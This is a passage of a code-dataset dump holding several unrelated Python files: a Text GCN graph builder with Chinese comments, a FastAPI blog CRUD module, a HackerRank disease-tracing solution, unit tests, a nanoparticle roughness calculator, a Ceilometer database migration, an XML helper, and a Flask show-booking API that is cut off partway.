features\ntest_size = len(test_ids)\n\nrow_tx = []\ncol_tx = []\ndata_tx = []\nfor i in range(test_size):\n doc_vec = np.array([0.0 for k in range(word_embeddings_dim)])\n doc_words = shuffle_doc_words_list[i + train_size]\n words = doc_words.split()\n doc_len = len(words)\n for word in words:\n if word in word_vector_map:\n word_vector = word_vector_map[word]\n doc_vec = doc_vec + np.array(word_vector)\n\n for j in range(word_embeddings_dim):\n row_tx.append(i)\n col_tx.append(j)\n # np.random.uniform(-0.25, 0.25)\n data_tx.append(doc_vec[j] / doc_len) # doc_vec[j] / doc_len\n\n# tx = sp.csr_matrix((test_size, word_embeddings_dim), dtype=np.float32)\ntx = sp.csr_matrix((data_tx, (row_tx, col_tx)),\n shape=(test_size, word_embeddings_dim))\n\nty = []\nfor i in range(test_size):\n doc_meta = shuffle_doc_name_list[i + train_size]\n temp = doc_meta.split('\\t')\n label = temp[2]\n one_hot = [0 for l in range(len(label_list))]\n label_index = label_list.index(label)\n one_hot[label_index] = 1\n ty.append(one_hot)\nty = np.array(ty)\n# print(ty)\n\n\n\n\n#************************************************************************************************************************************#\n# 7. 构建以下变量:\n# allx: 矩阵, 大小为(train_size + vocab_size)*word_embeddings_dim, 前train_size行存放document的embedding,后\n# vocab_size行存放单词表各个单词的词向量。如果不使用预训练的词向量,词向量默认为随机初始化。\n# ally: 矩阵,大小为(train_size + vocab_size)*label_list, 前train_size行存放document的label的one_hot编码,后vocab_size行都存放0向量\n#************************************************************************************************************************************#\n\n# allx: the feature vectors of both labeled and unlabeled training instances\n# (a superset of x)\n# unlabeled training instances -> words\n\nword_vectors = np.random.uniform(-0.01, 0.01, (vocab_size, word_embeddings_dim))\n\nfor i in range(len(vocab)):\n word = vocab[i]\n if word in word_vector_map:\n vector = word_vector_map[word]\n word_vectors[i] = vector\n\nrow_allx = []\ncol_allx = []\ndata_allx = []\n\nfor i in range(train_size):\n doc_vec = np.array([0.0 for k in range(word_embeddings_dim)])\n doc_words = shuffle_doc_words_list[i]\n words = doc_words.split()\n doc_len = len(words)\n for word in words:\n if word in word_vector_map:\n word_vector = word_vector_map[word]\n doc_vec = doc_vec + np.array(word_vector)\n for j in range(word_embeddings_dim):\n row_allx.append(int(i))\n col_allx.append(j)\n # np.random.uniform(-0.25, 0.25)\n data_allx.append(doc_vec[j] / doc_len) # doc_vec[j]/doc_len\n\n\nfor i in range(vocab_size):\n for j in range(word_embeddings_dim):\n row_allx.append(int(i + train_size))\n col_allx.append(j)\n data_allx.append(word_vectors.item((i, j)))\n\n\nrow_allx = np.array(row_allx)\ncol_allx = np.array(col_allx)\ndata_allx = np.array(data_allx)\n\nallx = sp.csr_matrix(\n (data_allx, (row_allx, col_allx)), shape=(train_size + vocab_size, word_embeddings_dim))\n\nally = []\nfor i in range(train_size):\n doc_meta = shuffle_doc_name_list[i]\n temp = doc_meta.split('\\t')\n label = temp[2]\n one_hot = [0 for l in range(len(label_list))]\n label_index = label_list.index(label)\n one_hot[label_index] = 1\n ally.append(one_hot)\n\nfor i in range(vocab_size):\n one_hot = [0 for l in range(len(label_list))]\n ally.append(one_hot)\n\nally = np.array(ally)\n\nprint(x.shape, y.shape, tx.shape, ty.shape, allx.shape, ally.shape)\n\n\n\n\n\n\n\n\n#*************************************************************************************************************\n# 8. build the Doc word heterogeneous graph (adjacent matrix)\n#*************************************************************************************************************\n\n# word co-occurence with context windows\nwindow_size = 20\nwindows = []\n\n'''\n 以大小为window_size、滑动步长为1的滑动窗口对每个document的单词进行分组,分组结果存入列表windows中。\n 例如windows[0]=['organization','university','maine'], windows[1]=['pin','map','din','cable']\n'''\nfor doc_words in shuffle_doc_words_list:\n words = doc_words.split()\n length = len(words)\n if length <= window_size:\n windows.append(words)\n else:\n # print(length, length - window_size + 1)\n for j in range(length - window_size + 1):\n window = words[j: j + window_size]\n windows.append(window)\n # print(window)\n\n'''\n word_window_freq, 字典, key=单词,value=包含该单词的window的个数\n'''\nword_window_freq = {}\nfor window in windows:\n appeared = set()\n for i in range(len(window)):\n if window[i] in appeared:\n continue\n if window[i] in word_window_freq:\n word_window_freq[window[i]] += 1\n else:\n word_window_freq[window[i]] = 1\n appeared.add(window[i])\n\n'''\n 以每个滑动窗口内的单词分组结果为单位,统计两个不同单词间所能产生的组合个数,\n 并存入字典word_pair_count,其key=单词1和单词2的id组合,value=包含该组合的window的数量(在window范围内,出现的共现次数)\n \n 例如第一层循环时,取得的window共有5个单词,每个单词在列表window中的位置为:window=[0,1,2,3,4,5]\n 那么第二层和第三层的循环,其需要处理列表window中以下两个位置单词组合的情况:\n j-i\n 0-1\n 0-2\n 1-2\n 0-3\n 1-3\n 2-3\n 0-4\n 1-4\n 2-4\n 3-4\n 0-5\n 1-5\n 2-5\n 3-5\n 4-5\n'''\nword_pair_count = {}\nfor window in windows:\n for i in range(1, len(window)):\n for j in range(0, i):\n word_i = window[i]\n word_i_id = word_id_map[word_i]\n word_j = window[j]\n word_j_id = word_id_map[word_j]\n if word_i_id == word_j_id:\n continue\n # 第一类组合: a-b\n word_pair_str = str(word_i_id) + ',' + str(word_j_id)\n if word_pair_str in word_pair_count:\n word_pair_count[word_pair_str] += 1\n else:\n word_pair_count[word_pair_str] = 1\n # 第二类组合:b-a\n word_pair_str = str(word_j_id) + ',' + str(word_i_id)\n if word_pair_str in word_pair_count:\n word_pair_count[word_pair_str] += 1\n else:\n word_pair_count[word_pair_str] = 1\n\n\n\n'''\n 计算单词和单词之间的边的权重pmi\n'''\nrow = []\ncol = []\nweight = []\nnum_window = len(windows)\n\nfor key in word_pair_count:\n temp = key.split(',')\n i = int(temp[0]) # 单词1的id\n j = int(temp[1]) # 单词2的id\n count = word_pair_count[key]\n word_freq_i = word_window_freq[vocab[i]]\n word_freq_j = word_window_freq[vocab[j]]\n pmi = log((1.0 * count / num_window) /\n (1.0 * word_freq_i * word_freq_j/(num_window * num_window)))\n if pmi <= 0:\n continue\n row.append(train_size + i)\n col.append(train_size + j)\n weight.append(pmi)\n\n# word vector cosine similarity as weights\n\n'''\nfor i in range(vocab_size):\n for j in range(vocab_size):\n if vocab[i] in word_vector_map and vocab[j] in word_vector_map:\n vector_i = np.array(word_vector_map[vocab[i]])\n vector_j = np.array(word_vector_map[vocab[j]])\n similarity = 1.0 - cosine(vector_i, vector_j)\n if similarity > 0.9:\n print(vocab[i], vocab[j], similarity)\n row.append(train_size + i)\n col.append(train_size + j)\n weight.append(similarity)\n'''\n\n\n'''\n doc_word_freq,字典,key=\"str(doc_id) + ',' + str(word_id)\", value=该doc_id和该word_id共现的次数\n'''\n# doc word frequency\ndoc_word_freq = {}\nfor doc_id in range(len(shuffle_doc_words_list)):\n doc_words = shuffle_doc_words_list[doc_id]\n words = doc_words.split()\n for word in words:\n word_id = word_id_map[word]\n doc_word_str = str(doc_id) + ',' + str(word_id)\n if doc_word_str in doc_word_freq:\n doc_word_freq[doc_word_str] += 1\n else:\n doc_word_freq[doc_word_str] = 1\n\n\n'''\n 计算单词和文档之间的边的权重tf_idf\n'''\nfor i in range(len(shuffle_doc_words_list)):\n doc_words = shuffle_doc_words_list[i]\n words = doc_words.split()\n doc_word_set = set()\n for word in words:\n if word in doc_word_set:\n continue\n j = word_id_map[word]\n key = str(i) + ',' + str(j)\n freq = doc_word_freq[key]\n if i < train_size: # 训练集部分\n row.append(i)\n else: # 测试集部分\n row.append(i + vocab_size)\n col.append(train_size + j)\n idf = log(1.0 * len(shuffle_doc_words_list) / word_doc_freq[vocab[j]])\n tf_idf = freq * idf\n weight.append(tf_idf)\n doc_word_set.add(word)\n\nnode_size = train_size + vocab_size + test_size\nadj = sp.csr_matrix((weight, (row, col)), shape=(node_size, node_size)) # 邻接矩阵\n\n\n\n#***************************************************************************\n# 9. save the object: x,y,tx,ty,allx,ally,adj\n#***************************************************************************\n'''\n dump objects\n'''\nf = open(\"data/ind.{}.x\".format(dataset), 'wb')\npkl.dump(x, f)\nf.close()\n\nf = open(\"data/ind.{}.y\".format(dataset), 'wb')\npkl.dump(y, f)\nf.close()\n\nf = open(\"data/ind.{}.tx\".format(dataset), 'wb')\npkl.dump(tx, f)\nf.close()\n\nf = open(\"data/ind.{}.ty\".format(dataset), 'wb')\npkl.dump(ty, f)\nf.close()\n\nf = open(\"data/ind.{}.allx\".format(dataset), 'wb')\npkl.dump(allx, f)\nf.close()\n\nf = open(\"data/ind.{}.ally\".format(dataset), 'wb')\npkl.dump(ally, f)\nf.close()\n\nf = open(\"data/ind.{}.adj\".format(dataset), 'wb')\npkl.dump(adj, f)\nf.close()\n","repo_name":"540117253/Code-Comments-of-Text_GCN","sub_path":"build_graph.py","file_name":"build_graph.py","file_ext":"py","file_size_in_byte":20683,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"34"} +{"seq_id":"10323107133","text":"from .. import models , schemas\nfrom sqlalchemy.orm import Session\nfrom fastapi import HTTPException, status\n\ndef get_all(db: Session):\n blogs = db.query(models.Blog).all()\n return blogs\n\ndef show(blog_id: int, db: Session):\n blog = db.query(models.Blog).filter(models.Blog.id == blog_id).first()\n if not blog:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail= f'Item {blog_id} not found')\n return {'msg': 'Response', 'code': 1, 'data': blog}\n\n\ndef create(request: schemas.Blog, db: Session):\n new_blog = models.Blog(title=request.title, body=request.body, user_id=1)\n db.add(new_blog)\n db.commit()\n db.refresh(new_blog)\n return {'msg': 'Response', 'code': 1, 'data': new_blog}\n\ndef destroy(blog_id: int, db: Session):\n blog = db.query(models.Blog).filter(models.Blog.id == blog_id)\n if not blog.first():\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=f'Item {blog_id} not found')\n blog.delete(synchronize_session=False)\n db.commit()\n return {'msg': 'Response', 'code': 1}\n\ndef update(blog_id: int, request: schemas.Blog, db: Session):\n blog=db.query(models.Blog).filter(models.Blog.id == blog_id)\n if not blog.first():\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=f'Item {blog_id} not found')\n blog.update({'title': request.title, 'body': request.body})\n db.commit()\n return {'msg': 'Response', 'code': 1, 'data': request}\n\n","repo_name":"yudcoltran/fastapi-sqlalchemy-authen-autho","sub_path":"blog/repository/blog.py","file_name":"blog.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"8747278235","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n\n# Complete the traceDisease function below.\n# initialStates is an array of strings, each string a line of input. \n# Your return value should also be a list of strings (see the prompt for the expected output format)\n# Content sent to stdout (i.e. any print statements) will be sent to a separate output that is ignored by the test checker.\n\n# constants\nHEALTHY = \"HEALTHY\"\nSICK = \"SICK\"\nRECOVERING = \"RECOVERING\"\n\n# data structures\nperson_health = {}\nperson2idx = {}\nidx2person = {}\ncity2idx = {}\n\ndef preProcess(initialStates):\n person_counter = 0\n city_counter = 0\n\n num_people = len(initialStates)\n num_cities = 0\n city_schedule = []\n\n for i in range(num_people):\n person_info = initialStates[i].split()\n person = person_info[0]\n\n person_health[person] = person_info[1] # read in\n person2idx[person] = person_counter\n idx2person[person_counter] = person\n\n person_counter = person_counter + 1\n\n this_person_schedule = []\n for j in range(2, len(person_info)):\n city = person_info[j]\n this_person_schedule.append(city)\n if city not in city2idx:\n num_cities = num_cities + 1\n city2idx[city] = city_counter\n\n city_counter = city_counter + 1\n\n city_schedule.append(this_person_schedule)\n\n return num_people, num_cities, city_schedule, person2idx, idx2person, city2idx\n\ndef get_curr_city_idx(person, step_idx, city_schedule):\n person_idx = person2idx[person]\n max_travels = len(city_schedule[person_idx])\n curr_loc_idx = step_idx % max_travels\n\n curr_city_idx = city2idx[city_schedule[person_idx][curr_loc_idx]]\n\n return curr_city_idx\n\ndef traceDisease(initialStates):\n num_people, num_cities, city_schedule, person2idx, idx2person, city2idx = preProcess(initialStates)\n output = \"\"\n output_list = []\n for i in range(num_people):\n output = output + idx2person[i] + \" \"\n\n output = output.rstrip()\n output_list.append(output)\n\n # processing step\n for i in range(365): # max number of turns allowed\n output = \"\"\n cities_status = [0] * num_cities\n people_status = [None] * num_people\n healthy_people = set()\n\n for person in person_health:\n people_status[person2idx[person]] = person_health[person]\n if person_health[person] == HEALTHY:\n healthy_people.add(person)\n else: # SICK or RECOVERING\n if person_health[person] == SICK:\n person_health[person] = RECOVERING\n elif person_health[person] == RECOVERING:\n person_health[person] = HEALTHY\n \n curr_city_idx = get_curr_city_idx(person, i, city_schedule)\n cities_status[curr_city_idx] = 1 # infested!\n\n for person in healthy_people:\n curr_city_idx = get_curr_city_idx(person, i, city_schedule)\n if cities_status[curr_city_idx] == 1:\n person_health[person] = SICK\n\n for j in range(num_people):\n output = output + people_status[j] + \" \"\n\n output = output.rstrip()\n output_list.append(output)\n\n # check if everyone is healthy\n all_healthy = True\n for j in range(num_people):\n if people_status[j] != HEALTHY:\n all_healthy = False\n break\n\n if all_healthy:\n output_list.append(str(i + 1))\n return output_list\n\n output_list.append(str(365))\n return output_list\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n initialStates_count = int(input())\n\n initialStates = []\n\n for _ in range(initialStates_count):\n initialStates_item = input()\n initialStates.append(initialStates_item)\n\n res = traceDisease(initialStates)\n\n fptr.write('\\n'.join(res))\n fptr.write('\\n')\n\n fptr.close()\n","repo_name":"pohjie/hackerrank","sub_path":"sick_travelers.py","file_name":"sick_travelers.py","file_ext":"py","file_size_in_byte":4012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"42534985573","text":"import unittest\nfrom Model import *\n\nclass FunctionCoverageTests(unittest.TestCase):\n\n def setUp(self):\n self.model = Model()\n\n def tearDown(self):\n print(\"next\")\n\n def test_read_in_csv(self):\n self.model.read_in_csv(\"testFileLoad.txt\")\n self.expected = ['Hello This Is A Test', 'Hello This is Another Test']\n self.actual = self.model.get_data_set()\n self.assertTrue(self.expected == self.actual)\n\n def test_wash_data(self):\n self.model.read_in_csv(\"TestData.csv\")\n self.model.wash_data()\n self.expected = 7\n self.actual = self.model.get_data_set_length()\n print(self.model.get_data_set_length())\n print(self.model.get_data_set())\n self.assertTrue(self.expected == self.actual)\n\nif __name__ == \"__main__\":\n unittest.main(verbosity=2)","repo_name":"jessicapelayo/BCPR301---Assignment-2","sub_path":"function_coverage_test.py","file_name":"function_coverage_test.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"37603661307","text":"import numpy as np\nimport pandas as pd\nimport static_info as stinfo\nimport read_lmp_data as rdlmp\nfrom colors_text import TextColor as bcolors\n\n\nclass Doc:\n \"\"\"calculate roughness of the nanoparticles\n Input: Read data: the DataFrames with Lammps format of Full atoms\n format,\n Output:\n Root mean square roughness RMS or rq\n \"\"\"\n\n\nclass Roughness:\n \"\"\"get RMS\"\"\"\n def __init__(self,\n np_data # Data of nanoparticles in LAMMPS format\n ) -> None:\n self.__roughness(np_data)\n\n def __roughness(self,\n np_data # Data of nanoparticles in LAMMPS format\n ) -> None:\n \"\"\"Calculate the roughness by finding atoms on the shell\"\"\"\n df: pd.DataFrame = self.__mk_rho(np_data.Atoms_df)\n df = self.__select_atoms(df)\n self.rms: float = self.__get_roughness(df)\n self.__print_info()\n del df\n\n def __print_info(self) -> None:\n \"\"\"print info on std\"\"\"\n print(f'{bcolors.OKCYAN}{self.__class__.__name__}: '\n f'({self.__module__})\\n'\n f'\\tRoot mean square roughness for shell of size '\n f'\"{stinfo.Constants.Shell_radius}\" is \"{self.rms:.3f}\"'\n f'{bcolors.ENDC}')\n\n def __get_roughness(self,\n df: pd.DataFrame # Atoms df with select atoms\n ) -> float:\n \"\"\"calculate the roughness of the atoms inside the shell\"\"\"\n rms: list[float] = list(df['rho']*df['rho'])\n return np.sqrt(np.mean(rms))\n\n def __select_atoms(self,\n df: pd.DataFrame # Select atoms inside the shell\n ) -> pd.DataFrame:\n \"\"\"return atoms which ate inside the shell\"\"\"\n return df[df['rho'] >= 0]\n\n def __mk_rho(self,\n Atoms_df: pd.DataFrame # Atoms info in Lammps format\n ) -> pd.DataFrame:\n \"\"\"calculate and add rho column (distance from origin) of all\n the atom\"\"\"\n df: pd.DataFrame = Atoms_df.copy()\n df['rho']: list[int] = [-1 for _ in df['atom_id']]\n for item, row in Atoms_df.iterrows():\n df.at[item, 'rho'] = self.__get_rho(row['x'], row['y'], row['z'])\n df = self.__apply_shell(df)\n return df\n\n def __apply_shell(self,\n Atoms_df: pd.DataFrame # Atoms df with rho\n ) -> pd.DataFrame:\n \"\"\"cut the out the radius of the shell from rho to find atoms\n inside the shell\"\"\"\n inner_r: float # min of the shell (inner radius)\n inner_r = np.max(Atoms_df['rho'] - stinfo.Constants.Shell_radius)\n df: pd.DataFrame = Atoms_df.copy()\n df['rho'] -= inner_r\n return df\n\n def __get_rho(self,\n x: float, # X component of the atoms\n y: float, # y component of the atoms\n z: float, # z component of the atoms\n ) -> float:\n \"\"\"return the rho of the atom\"\"\"\n return np.sqrt(x*x + y*y + z*z)\n","repo_name":"saeed-amiri/np_silica","sub_path":"codes/roughness_rms.py","file_name":"roughness_rms.py","file_ext":"py","file_size_in_byte":3058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"36109530388","text":"import migrate\nimport sqlalchemy as sa\n\n\ndef handle_rid_index(meta, downgrade=False):\n if meta.bind.engine.name == 'sqlite':\n return\n\n resource = sa.Table('resource', meta, autoload=True)\n sample = sa.Table('sample', meta, autoload=True)\n params = {'columns': [sample.c.resource_id],\n 'refcolumns': [resource.c.id],\n 'name': 'fk_sample_resource_id'}\n if meta.bind.engine.name == 'mysql':\n # For mysql dialect all dependent FK should be removed\n # before index create/delete\n migrate.ForeignKeyConstraint(**params).drop()\n\n index = sa.Index('idx_sample_rid_cname', sample.c.resource_id,\n sample.c.counter_name)\n index.create() if downgrade else index.drop()\n\n if meta.bind.engine.name == 'mysql':\n migrate.ForeignKeyConstraint(**params).create()\n\n\ndef upgrade(migrate_engine):\n meta = sa.MetaData(bind=migrate_engine)\n meter = sa.Table(\n 'meter', meta,\n sa.Column('id', sa.Integer, primary_key=True),\n sa.Column('name', sa.String(255), nullable=False),\n sa.Column('type', sa.String(255)),\n sa.Column('unit', sa.String(255)),\n sa.UniqueConstraint('name', 'type', 'unit', name='def_unique'),\n mysql_engine='InnoDB',\n mysql_charset='utf8'\n )\n meter.create()\n sample = sa.Table('sample', meta, autoload=True)\n query = sa.select([sample.c.counter_name, sample.c.counter_type,\n sample.c.counter_unit]).distinct()\n for row in query.execute():\n meter.insert().values(name=row['counter_name'],\n type=row['counter_type'],\n unit=row['counter_unit']).execute()\n\n meter_id = sa.Column('meter_id', sa.Integer)\n meter_id.create(sample)\n params = {'columns': [sample.c.meter_id],\n 'refcolumns': [meter.c.id]}\n if migrate_engine.name == 'mysql':\n params['name'] = 'fk_sample_meter_id'\n if migrate_engine.name != 'sqlite':\n migrate.ForeignKeyConstraint(**params).create()\n\n index = sa.Index('ix_meter_name', meter.c.name)\n index.create(bind=migrate_engine)\n\n for row in sa.select([meter]).execute():\n (sample.update().\n where(sa.and_(sample.c.counter_name == row['name'],\n sample.c.counter_type == row['type'],\n sample.c.counter_unit == row['unit'])).\n values({sample.c.meter_id: row['id']}).execute())\n\n handle_rid_index(meta)\n\n sample.c.counter_name.drop()\n sample.c.counter_type.drop()\n sample.c.counter_unit.drop()\n sample.c.counter_volume.alter(name='volume')\n\n\ndef downgrade(migrate_engine):\n meta = sa.MetaData(bind=migrate_engine)\n sample = sa.Table('sample', meta, autoload=True)\n sample.c.volume.alter(name='counter_volume')\n sa.Column('counter_name', sa.String(255)).create(sample)\n sa.Column('counter_type', sa.String(255)).create(sample)\n sa.Column('counter_unit', sa.String(255)).create(sample)\n meter = sa.Table('meter', meta, autoload=True)\n for row in sa.select([meter]).execute():\n (sample.update().\n where(sample.c.meter_id == row['id']).\n values({sample.c.counter_name: row['name'],\n sample.c.counter_type: row['type'],\n sample.c.counter_unit: row['unit']}).execute())\n\n params = {'columns': [sample.c.meter_id],\n 'refcolumns': [meter.c.id]}\n if migrate_engine.name == 'mysql':\n params['name'] = 'fk_sample_meter_id'\n if migrate_engine.name != 'sqlite':\n migrate.ForeignKeyConstraint(**params).drop()\n\n handle_rid_index(meta, True)\n\n sample.c.meter_id.drop()\n meter.drop()\n","repo_name":"ChinaMassClouds/copenstack-server","sub_path":"openstack/src/ceilometer-2014.2.2/ceilometer/storage/sqlalchemy/migrate_repo/versions/031_add_new_meter_table.py","file_name":"031_add_new_meter_table.py","file_ext":"py","file_size_in_byte":3701,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"34"} +{"seq_id":"22047854074","text":"# -*- coding: utf-8 -*-\n# Author : Jin Kim\n# e-mail : jinkim@seculayer.co.kr\n# Powered by Seculayer © 2021 Service Model Team\n\n######################################################################################\n\nfrom xml.etree.ElementTree import ElementTree, parse, fromstring\n\n\nclass XMLUtils(object):\n @staticmethod\n def xml_load(**kwargs):\n xml_file_name = kwargs[\"filename\"]\n tree = parse(xml_file_name)\n\n return tree\n\n @staticmethod\n def xml_load_str(xml_str):\n tree = ElementTree(fromstring(xml_str))\n return tree\n\n @staticmethod\n def xml_write(**kwargs):\n xml_file_name = kwargs[\"filename\"]\n # indent\n\n ElementTree(kwargs[\"element\"]).write(\n xml_file_name, encoding=\"utf-8\", xml_declaration=True\n )\n\n @staticmethod\n def xml_parse(root, _key):\n if root is None:\n return None\n else:\n root_keys = root.findall(_key)\n return root_keys\n\n @staticmethod\n def indent(elem, level=0):\n i = \"\\n\" + level * \"\\t\"\n if len(elem):\n if not elem.text or not elem.text.strip():\n elem.text = i + \"\\t\"\n if not elem.tail or not elem.tail.strip():\n elem.tail = i\n for elem in elem:\n XMLUtils.indent(elem, level + 1)\n if not elem.tail or not elem.tail.strip():\n elem.tail = i\n else:\n if level and (not elem.tail or not elem.tail.strip()):\n elem.tail = i\n return elem\n\n @classmethod\n def xml2dict_list(cls, xml_data, keys):\n res_dict_list = list()\n for data in xml_data:\n res_dict_list.append(cls._xml2dict(xml_data=data, keys=keys))\n\n return res_dict_list\n\n @staticmethod\n def _xml2dict(xml_data, keys):\n res_dict = dict()\n for key in keys:\n try:\n res_dict[key] = xml_data.attrib[key]\n except :\n res_dict[key] = None\n return res_dict\n\n @staticmethod\n def find(xml_data, key):\n return xml_data.find(key).text\n\n\nif __name__ == '__main__':\n XMLUtils.xml_load(filename=\"./example.xml\")","repo_name":"seculayer/AutoAPE-dprs","sub_path":"dprs/common/utils/XMLUtils.py","file_name":"XMLUtils.py","file_ext":"py","file_size_in_byte":2210,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"34"} +{"seq_id":"43642687219","text":"import json\nfrom flask import Blueprint, request, jsonify, current_app\nfrom . import db, redis_client\nfrom .models import Show, Theatre, Booking\nimport uuid\nfrom werkzeug.utils import secure_filename\nimport os\nfrom datetime import datetime, date\nfrom sqlalchemy import or_\nfrom . import stripe\n\nshow_management = Blueprint('show_management', __name__)\n\n@show_management.route('/api/shows', methods=['GET'])\ndef get_all_shows():\n try:\n cached_data = redis_client.get('all_shows')\n if cached_data:\n return cached_data, 200\n\n shows = Show.query.all()\n show_data = []\n for show in shows:\n show_info = {\n 'id': show.id,\n 'name': show.name,\n 'rating': show.rating,\n 'tags': show.tags,\n 'ticket_price': show.ticket_price,\n 'theatre_id': show.theatre_id,\n 'start_time': show.start_time,\n 'end_time': show.end_time,\n 'date': show.date,\n 'trailer_url': show.trailer_url,\n 'poster': show.poster,\n 'available_seats': show.available_seats,\n 'theatre_name': show.theatre.name,\n 'theatre_place': show.theatre.place,\n }\n show_data.append(show_info)\n\n show_data_json = jsonify(show_data)\n redis_client.setex('all_shows', 10, show_data_json.data)\n\n return show_data_json, 200\n\n except Exception as e:\n return jsonify({'error': str(e)}), 500\n\n\n#Get all shows from a specific theatre\n@show_management.route('/api/shows/theatre/', methods=['GET'])\ndef get_shows_for_theatre(theatre_id):\n try:\n cached_data = redis_client.get(f'shows_for_theatre_{theatre_id}')\n if cached_data:\n return cached_data, 200\n\n theatre = Theatre.query.get(theatre_id)\n if not theatre:\n return jsonify({'message': 'Theatre with given ID does not exist.'}), 404\n\n shows = Show.query.filter_by(theatre_id=theatre_id).all()\n\n shows_data = []\n for show in shows:\n shows_data.append({\n 'id': show.id,\n 'name': show.name,\n 'rating': show.rating,\n 'tags': show.tags,\n 'ticket_price': show.ticket_price,\n 'theatre_id': show.theatre_id,\n 'start_time': show.start_time,\n 'end_time': show.end_time,\n 'date': show.date,\n 'trailer_url': show.trailer_url,\n 'poster': show.poster,\n 'available_seats': show.available_seats\n })\n\n shows_data_json = jsonify(shows_data)\n redis_client.setex(f'shows_for_theatre_{theatre_id}', 10, shows_data_json.data)\n\n return shows_data_json, 200\n\n except Exception as e:\n return jsonify({'error': str(e)}), 500\n\n\n# API to get a single show by ID\n@show_management.route('/api/shows/', methods=['GET'])\ndef get_show_by_id(show_id):\n cached_data = redis_client.get(f'show_{show_id}')\n if cached_data:\n return cached_data,200\n \n show = Show.query.get(show_id)\n if not show:\n return jsonify({'message': 'Show with given ID does not exist.'}), 404\n\n show_data = {\n 'id': show.id,\n 'name': show.name,\n 'rating': show.rating,\n 'tags': show.tags,\n 'ticket_price': show.ticket_price,\n 'theatre_id': show.theatre_id,\n 'start_time': show.start_time,\n 'end_time': show.end_time,\n 'date': show.date,\n 'trailer_url': show.trailer_url,\n 'poster': show.poster,\n 'available_seats': show.available_seats\n }\n show_data_json = jsonify(show_data)\n redis_client.setex(f'show_{show_id}', 10, show_data_json.data)\n\n return jsonify(show_data), 200\n\n\ndef saveImg(file, fileName):\n file.save(os.path.join(current_app.config['UPLOAD_FOLDER'], fileName))\n\n# API to create a new show\n@show_management.route('/api/shows', methods=['POST'])\ndef create_show():\n data = request.form\n name = data.get('name')\n rating = data.get('rating')\n tags = data.get('tags')\n ticket_price = data.get('ticket_price')\n start_time = datetime.strptime(data.get('start_time'), '%H:%M')\n end_time = datetime.strptime(data.get('end_time'), '%H:%M')\n date = datetime.strptime(data.get('date'), '%Y-%m-%d')\n user_id = data.get('user_id')\n trailer_url = data.get('trailer_url')\n posterImg = request.files.get('poster')\n\n theatre = Theatre.query.get(data.get('theatre_id'))\n if not theatre:\n return jsonify({'message': 'Theatre with given ID does not exist.'}), 404\n theatre_id = theatre.id\n available_seats = theatre.capacity\n\n if not name or not rating or not ticket_price or not theatre_id or not start_time or not end_time or not date or not user_id or not trailer_url or not posterImg:\n return jsonify({'message': 'Name, rating, ticket price, start time, end time, date, trailer url, poster, user id and theatre ID are required.'}), 400\n\n # Save the uploaded poster image to the server\n filename = str(uuid.uuid1()) + \"_\" + secure_filename(posterImg.filename)\n filepath = os.path.join(current_app.config['UPLOAD_FOLDER'], filename)\n posterImg.save(filepath)\n\n new_show = Show(name=name, rating=rating, tags=tags, ticket_price=ticket_price, theatre_id=theatre_id, start_time=start_time,\n end_time=end_time, date=date, user_id=user_id, trailer_url=trailer_url, poster=filename, available_seats=available_seats)\n db.session.add(new_show)\n db.session.commit()\n\n return jsonify({'message': 'Show created successfully.', 'show_id': new_show.id}), 201\n\n# API to update an existing show\n@show_management.route('/api/shows/', methods=['PUT'])\ndef update_show(show_id):\n data = request.form\n name = data.get('name')\n rating = data.get('rating')\n tags = data.get('tags')\n ticket_price = data.get('ticket_price')\n theatre_id = data.get('theatre_id')\n start_time = datetime.strptime(data.get('start_time'), '%H:%M')\n end_time = datetime.strptime(data.get('end_time'), '%H:%M')\n date = datetime.strptime(data.get('date'), '%Y-%m-%d')\n user_id = data.get('user_id')\n trailer_url = data.get('trailer_url')\n posterImg = request.files.get('poster')\n\n if not name or not rating or not ticket_price or not theatre_id or not start_time or not end_time or not date or not user_id or not trailer_url:\n return jsonify({'message': 'Name, rating, ticket price, start time, end time, date, trailer url, poster, user id and theatre ID are required.'}), 400\n\n show = Show.query.get(show_id)\n if not show:\n return jsonify({'message': 'Show with given ID does not exist.'}), 404\n\n if not Theatre.query.filter_by(id=theatre_id).first():\n return jsonify({'message': 'Theatre with given ID does not exist.'}), 404\n \n if posterImg:\n filename = str(uuid.uuid1()) + \"_\" + secure_filename(posterImg.filename)\n filepath = os.path.join(current_app.config['UPLOAD_FOLDER'], filename)\n posterImg.save(filepath)\n show.poster = filename\n\n show.name = name\n show.rating = rating\n show.tags = tags\n show.ticket_price = ticket_price\n show.theatre_id = theatre_id\n show.start_time = start_time\n show.end_time = end_time\n show.date = date\n show.user_id = user_id\n show.trailer_url = trailer_url\n db.session.commit()\n\n return jsonify({'message': 'Show updated successfully.'}), 200\n\n# API to delete a show\n@show_management.route('/api/shows/', methods=['DELETE'])\ndef delete_show(show_id):\n show = Show.query.get(show_id)\n if not show:\n return jsonify({'message': 'Show with given ID does not exist.'}), 404\n\n bookings = Booking.query.filter_by(show_id=show_id).all()\n\n for booking in bookings:\n db.session.delete(booking)\n\n db.session.delete(show)\n db.session.commit()\n\n return jsonify({'message': 'Show deleted successfully.'}), 200\n\n# API to search shows based on a single query parameter\n@show_management.route('/api/shows/search', methods=['GET'])\ndef search_shows():\n cached_data = redis_client.get('search_results')\n if cached_data:\n return cached_data,200\n\n # Get the search query from query parameters\n search_query = request.args.get('q')\n\n # Perform a database query to filter shows based on the search query\n shows = Show.query.filter(\n or_(\n Show.name.ilike(f'%{search_query}%'),\n Show.tags.ilike(f'%{search_query}%'),\n 